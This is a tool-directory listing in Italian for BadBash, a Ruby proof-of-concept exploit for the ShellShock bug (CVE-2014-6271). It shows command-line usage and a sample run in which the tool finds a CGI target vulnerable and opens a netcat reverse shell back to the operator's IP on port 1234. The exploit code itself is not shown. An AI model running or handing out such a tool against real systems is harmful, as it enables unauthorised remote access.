Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
BadBash — Strumento PoC RCE per CVE-2014-6271 (ShellShock) | Kitploit
Strumenti/GitHubGitHub/securusglobal/badbash
Generazione di PayloadAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingStrumento di Accesso Remoto
GitHubsecurusglobal/badbash

BadBash

Strumento PoC RCE per CVE-2014-6271 (ShellShock)

Vedi Repository
4111 anni faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

BadBash

CVE-2014-6271 (ShellShock) RCE PoC tool

======= BadBash è uno strumento di exploit RCE per CVE-2014-6271. La versione base controlla solo il sito HTTP CGI e fornisce solo una reverse shell netcat sulla porta 1234.

Sviluppatore : Andy Yang Versione : 0.1.0 Licenza : GPLv3

Progetto GitHub originale : https://github.com/RainMak3r/Rainstorm

================================================================================================ RainMak3r@Could:~/Desktop# ruby BadBash.rb -h

BadBash - strumento RCE per CVE-2014-6271 di Andy Yang La versione base controlla solo il sito HTTP La versione base fornisce solo una reverse shell netcat sulla porta 1234

ESEMPIO DI UTILIZZO:

root@kitploit:~
 ./BBash.rb  -t 'www.target.com/cgi-folder/cgi.sh' -d '127.0.0.1'
 ./BBash.rb  -t '10.0.0.1/cgi-folder/cgi.sh' -d '127.0.0.1'
-t, --Target CGI path            Percorso completo della pagina CGI
-d, --Destination IP             Il tuo indirizzo IP in ascolto per una connessione in entrata
-h, --help                       Mostra l'aiuto

================================================================================================ Esempio di utilizzo.

RainMak3r@Could:~/Desktop#ruby BadBash.rb -t '172.16.235.140/cgi-bin/Andy.sh' -d '172.16.189.1'

[Info] Verifica se il target è vulnerabile........

[Info] Potrebbero essere necessari fino a 10 secondi........

[Info] Il target è vulnerabile!!!

[Info] Usa NC per ascoltare sulla porta 1234 per la reverse shell..........

[Info] Esecuzione dell'exploit per una reverse shell verso 172.16.189.1:1234 tramite netcat ..........

Scarica lo strumento